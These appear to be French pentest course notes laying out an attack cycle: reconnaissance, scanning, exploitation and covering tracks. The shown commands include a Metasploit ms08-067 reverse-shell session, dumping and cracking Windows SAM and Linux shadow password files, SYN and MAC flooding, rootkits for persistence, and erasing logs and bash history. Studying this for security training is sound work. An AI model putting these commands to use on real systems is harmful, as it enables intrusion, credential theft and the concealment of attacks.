Comment attaquer une cible ?

Méthode d'analyse

Pour attaquer une cible, il faut d'abord la connaître et cela se réalise en plusieurs étape (et de manière cyclique) :

Reconnaissance

Instervention sur les sites :

  • HTTrack : pour aspirer tout le contenu d'un site web
  • Google : en utlisant des mot-clés dans la barre de recherche comme : cache:toto.com + filetype:pdf + inurl:admin
  • whois : pour obtenir des infos sur le détendeur du domaine : https://whois-search.com/
  • robtex.com : pour créer une carte d'infra disponible publiquement (DMZ?)
  • http://toolbar.netcraft.com/site_report pour obtenir l’historique du site web
  • Metagoofil : recherche des documents spécifique

mkdir files ./metagoofil.py -d syngress.com -t pdf,doc,xls,pptx -n 20 -o files -f results.html

Intervention sur les DNS :

  apt-get install fierce

Scan

Cette deuxième phase consiste à associer aux adresses IP des ports et des services.

Ces différents types de scan sont décrit ici : https://www.information-security.fr/les-scans-ports-via-tcp-xmas-null-ack/

Exploitation

Cette troisième phase concerne l'exploitation / le crackage / le force brute d'un accès au départ non autorisé.

hping3 -i ul -S -p 80 192.168.42.1

Pour contrer la commande ci-dessus: il faut ajouter une règle de filtrage spécifique au blocage des paquets SYN.

Exemple d'utilisation :

search ms08-067
use exploit/windows/smb/ms08_067_netcpi
show payloads
set payload window/vncinject/reverse_tcp
show options
set RHOST 192.168.1.10
set LHOST 192.168.1.50
exploit

Les bind = exploit et connexion vers la cible les reverse = exploit vers la cible et la connexion vers l'attaquant

Pour aller plus loin, il existe meterpreter et Armitage qui est comme metasploit mais en mode graphique.

  • John –test : permet d'obtenir le nombre de coups par seconde (c/s) (benchmark)
  Récupérer les mots de passe windows :

Récup des fichiers SAM et SYSTEM dans /windows/System32/config/ puis :

samdump2 SYSTEM SAM > mdp.txt
John mdp.txt --format=nt (?)

Redéfinir la config des utilisateurs :

chntpw -i /Windows/System32/config/SAM

Récupérer les mots de passe Linux :

unshadow /etc/passwd /etc/shadow > mdp.txt
john mdp.txt

Flood sur un commutateur :

macof -i eth0 -s IP_source -d IP_destination

Scan de vulnérabilités effectué par nikto :

mikto -h ip_distante -p 80,443
  • w3af pour scanner et exploiter ces failles
  • webscarab qui indexe un site (liste les pages liées entre elles) + capable d'intercepter les requêtes
  • Intercepter les requêtes avec ZAP (OWASP) + scan + indéxation

Maintien de l'accès

Outils :

  • netcat, cryptcat (voir ci-dessous)
  • hacker defender
  • rootkit
  • revealer
  • vice
  • blacklight (f-secure)

Supprimer ses traces

Il faut repérer la date d'accès au système, puis éffacer dans les fichiers de logs (/var/logs/wtmp, var/log/auth.log, /var/log/syslog eventuellement ) et logs applicatifs suivant leur configurations. Ce n'est pas simple pour utmp et wtmp, car ils sont dans un format particulier, qui nécessite un programme dédié (clear + utmpdump + …) Supprimer l'historique de l'utilisateur (~/.bash_history si on est en bash et celui de root). Changer les dates de modification et de lecture des fichiers édités pour leur remettre l'ancienne date (touch ­m ­a ­t <date>). Néanmoins, une trace reste visible avec la commande stat Enfin, à la déconnexion, de nouvelles logs seront posés.